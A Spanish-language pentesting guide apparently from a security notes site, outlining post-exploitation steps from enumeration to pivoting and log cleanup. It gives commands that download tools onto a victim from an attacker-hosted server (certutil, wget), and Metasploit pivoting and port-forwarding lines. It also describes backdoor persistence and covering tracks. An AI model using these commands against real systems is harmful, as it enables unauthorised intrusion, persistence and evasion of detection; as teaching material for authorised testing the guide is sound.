Appearance
👑 Post-Explotación
Para no perdernos en el caos del sistema, seguimos esta ruta crítica:
✅ Metodología de Post-Explotación
1. Enumeración local (Reconocimiento del terreno)
2. Transferencia de archivos (Mover herramientas)
3. Mejora de la shell (Estabilización TTY)
4. Escalada de privilegios (Control total)
5. Persistencia (Asegurar el acceso)
6. Extracción de credenciales (Hashes y contraseñas)
7. Pivoting (Salto a otras redes)
8. Limpieza de huellas (Sigilo)
🔍 1. Enumeración Local
Lo primero es saber quiénes somos. No es lo mismo ser un servicio con pocos privilegios que un usuario con acceso a carpetas compartidas. Debemos identificar la arquitectura del sistema, usuarios activos y posibles vectores de escalada.
- 🐧 Post-Explotación en Linux: Enumeración de binarios SUID, permisos de sudo y mejora de shell (TTY).
- 🪟 Post-Explotación en Windows: Enumeración de privilegios (SeImpersonate), servicios y registros.
📂 2. Transferencia de Archivos
Estamos en casa ajena y sin herramientas. Para seguir con el pentest (ya sea escalada, enumeración o looting), puede que necesitamos transferirlas; lo más fácil es convertir tu máquina en un servidor temporal.
El servidor web de Python
Desde tu terminal de atacante, levantas un servicio en el puerto que prefieras. Esto permite que el objetivo pueda "ver" tus archivos y descargarlos.
bash
# Servidor en tu máquina (Atacante).
python -m SimpleHTTPServer <PORT>
python3 -m http.server <PORT> # Para Python3Comandos de descarga
Una vez el servidor está arriba, usamos herramientas nativas del sistema víctima para traer el archivo.
En Windows (usando Certutil):
bash
certutil -urlcache -f http://<TU_IP>/<ARCHIVO> <NOMBRE_SALIDA>En Linux (usando Wget):
bash
wget http://<TU_IP>/<ARCHIVO>🐚 3. Mejora de la shell
Una shell precaria puede dificultar el trabajo. Para estabilizarla y obtener una terminal interactiva completa:
📈 4. Escalada de Privilegios
El objetivo final en cualquier máquina es el control total (root en Linux o SYSTEM en Windows).
Para ver los métodos específicos de cada sistema, consulta las guías correspondientes de Linux y Windows mencionadas arriba.
El objetivo final en cualquier máquina es el control total (root en Linux o SYSTEM en Windows).
⏳ 5. Persistencia
Imagina que logras entrar explotando una vulnerabilidad específica; si mañana el administrador parchea el sistema o actualiza el software, tu vía de entrada habrá desaparecido para siempre. Para evitar esto utilizamos la persistencia: el arte de instalar backdoors, configurar servicios o crear usuarios que nos aseguren el acceso al objetivo, incluso si el sistema se reinicia o nuestra sesión actual se interrumpe.
🔑 6. Extracción de Credenciales
Consiste en obtener hashes y contraseñas almacenadas en el sistema para realizar movimientos laterales o crackeo offline.
🌐 7. Pivoting (Movimiento Lateral)
Pivotar es usar una máquina ya comprometida para acceder a otras que no son visibles directamente desde el exterior. Es aquí donde la metodología se vuelve recursiva: al saltar a una nueva red, debemos empezar de nuevo desde el paso 1 (Enumeración).
Configuración del túnel (Metasploit)
Si utilizas Metasploit, primero debes indicar al framework cómo llegar a la red interna descubierta.
bash
run autoroute -s <red_interna/máscara>Para usar herramientas externas (como Nmap o un navegador) a través de este túnel, necesitamos levantar un proxy SOCKS en Metasploit (auxiliary/server/socks_proxy) y configurar Proxychains en nuestra máquina.
bash
# Ejemplo de escaneo a través del proxy
proxychains nmap -Pn -sT <IP_INTERNA>💡 Tip de Nmap con Proxychains
Es obligatorio usar los flags -Pn (para evitar el ping, que suele fallar en proxies) y -sT (para forzar un escaneo TCP completo), ya que los proxies SOCKS no suelen gestionar paquetes ICMP o SYN de forma transparente.
Descubrimiento de red
Si ya tienes privilegios en la máquina puente, puedes realizar un escaneo ARP para identificar otros equipos vivos en la subred interna sin necesidad de ruidos innecesarios.
bash
# Ejemplo para Windows desde Meterpreter
run post/windows/gather/arp_scanner RHOSTS=10.2.16.0/20Port Forwarding
Si solo necesitas interactuar con un servicio específico de una IP interna, el "Port Forwarding" es la opción más limpia. Traes un puerto remoto a un puerto de tu propio localhost.
bash
portfwd add -l <PUERTO_LOCAL> -p <PUERTO_REMOTO> -r <IP_OBJETIVO>🧹 8. Limpieza de Huellas
Es fundamental borrar el rastro de nuestra actividad (logs, archivos temporales y herramientas subidas) para evitar ser detectados.